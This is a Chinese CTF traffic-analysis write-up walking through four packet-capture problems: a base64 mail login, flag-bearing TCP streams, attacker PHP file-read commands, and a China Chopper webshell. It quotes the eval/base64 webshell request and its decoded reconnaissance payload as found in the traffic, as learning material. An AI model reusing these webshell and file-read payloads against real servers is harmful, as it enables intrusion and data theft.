ctf流量分析练习一

最近在学习流量分析这块的内容，找到一篇不错的文章，就准备复盘一下。

原文链接：https://www.freebuf.com/column/169738.html

问题一

打开这个流量包，大致分析一下是一个邮箱请求登陆的一个流量包，一眼就看见了 user和pass，需要base64解密一下即可。
base64解密地址：https://base64.supfree.net/

username：test@51elab.com
password：FLAG:ISCCTESTpas

flag就藏在password里

问题二

随意的追踪一个tcp流就发现了flag，可是这是我一直不太明白的，拿到一个流量包，如何判断追踪那个流呢？

问题三

切换至http进行查看

发现大量数据爆破，猜想是黑客进行扫描
浏览之后，发现最后存在可疑操作

黑阔执行phpinfo成功
于是开始执行下面两句话：

print_r(gzcompress(file_get_contents(base64_decode(%22aW5kZXgucGhw%22))))；
print_r(gzcompress(file_get_contents(base64_decode(%22ZmxhZy50eHQ%22))));

将上面两句话中进行操作的文件进行base64解密
注意：%22 是双引号的url编码，要去掉之后再解码，才可以得到正确的文件名
index.php
flag.txt
我们切换至原始数据，提取flag.txt的gz压缩二进制内容
这里我卡了好久，不过最终还是整明白了，找到了flag.txt的gz压缩二进制内容，这里多亏了这个文章:
https://blog.csdn.net/chrycoder/article/details/86525316
看了这个文章大致就明白了，我就简单截个图说一说就好了

我的理解：
黑阔在这里把flag.txt中的内容进行读取，并进行gz压缩
然后我们可以确定压缩的ascii内容如下
切换到原始数据，发现下面全变成了二进制代码，于是要去找那个gz压缩的二进制代码到底是哪个，这时就用到了010Editor
点击save as 为1.tar.gz，再用010Editor打开，对照右边的内容去确定二进制到底要选那一段，最终确定如下：
得到flag.txt的gz压缩二进制内容

789ccbc82c492e49abb6304d32484c354eb4483437b048b234324f4a334c343648494b334e36333531a8e5020018cb0c6c

保存成文件
然后写脚本进行解压缩

    php<?php $a = gzuncompress(file_get_contents('./1'));echo $a;?>

按照这个脚本我并没有搞成功，尝试对字符串直接压缩也不可以，无奈，先跳过块了，说不定之后会找到症结所在。。

问题四

同样，我们先查看http流量
发现有人不断向/uploads/dvwa.php提交post数据
怀疑这里存在一句话木马，于是追踪tcp流
发现端倪，这里有个cmd，url解码
也就是：

cmd=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==

对z0进行base64解码，如下：

 @ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}\t";
if(substr($D,0,1)!="/")
{foreach(range("A","Z") as $L)
if(is_dir("{$L}:"))
$R.="{$L}:";
}
$R.="\t";
$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';
$usr=($u)?$u['name']:@get_current_user();
$R.=php_uname();
$R.="({$usr})";
print $R;;
echo("|<-");
die();

发现大多都是中国菜刀的流量，遍历查看所有黑客操作，
使用tcp.stream eq x x代表一个数字
在tcp stream 5和6发现了猫腻
tcp.stream eq 5

ctf流量分析练习一相关推荐

ctf流量分析练习二
上次的流量分析做的我一个脑袋两个大!但是不能放弃啊,再找一些题来练练手 0x01 经典题型 CTF题型主要分为流量包修复.WEB流量包分析.USB流量包分析和其他流量包分析. 01 流量包修复比赛过 ...
2021年云南省职工职业技能大赛CTF流量分析题（wireshark）WriteUp
2021年云南省职工职业技能大赛CTF流量分析题(wireshark)WriteUp .0x00 前言本人作为业余爱好者参加了2021年云南省职工职业技能大赛的网络安全比赛,比赛形式以CTF+理论考 ...
CTF流量分析常见题型(二)-USB流量
0x00 前言在学习Wireshark常见使用时,对常见CTF流量分析题型和铁人三项流量分析题的部分问题进行了简单总结.由于篇幅过长,于是另起一篇总结USB流量包分析,包括键盘流量和鼠标流量. 0x ...
一道ctf流量分析题
此ctf用到wireshark软件,Wireshark可以帮助解决一些问题比如:丢包.延迟.DDoS攻击.它可以将网络流量展现,并可以通过软件内部的工具对流量进行分析,从而找出问题所在,并解决问题. ...
wireshark流量分析--巧观察
在CTF流量分析中,在流量包中可以隐藏好多东西,上面有篇文章说道在有大量流量包的情况下要善于运用过滤协议,来节省时间.但是,有些情况下,过滤是过滤不出东西的,比如在这道题目中我们运用过滤协议过滤不出东 ...
CTF——MISC——流量分析
目录一.流量包修复二.协议分析三.数据提取例题: 1,题目:Cephalopod(图片提取) 2,题目:特殊后门(icmp协议信息传输) 3,题目:手机热点(蓝牙传输协议obex,数据提取) ...
CTF 流量包相关-流量分析(1)
声明一下本文是根据b站-风二西大佬的视频边做题边总结写成的,可以去支持一下风佬,风佬太强辣!!! 风佬流量分析题合集风佬流量分析配套题与脚本另外本人也是个初学者,文章里面如果有错误,记得来踢我 ...
流量分析——安恒科技（八月CTF）
流量分析一.题目背景二.关卡列表三.解题过程 1.黑客使用的扫描器 2.黑客扫描到的登陆后台 3.黑客登陆web后台所使用的账号密码(形式:username/password) 4.黑客上传的w ...
CTF misc之流量分析题套路总结
1.前言昨天去I春秋刷了几题流量分析题,然后总结了一下流量分析题的做题方法. 2.刷题 2.1 可恶的黑客步骤一.HTTP追踪流先了解进行什么操作可以看到是传了webshell然后进行文件操作 ...

ctf流量分析练习一

问题一

问题二

问题三

问题四

ctf流量分析练习一相关推荐

最新文章

热门文章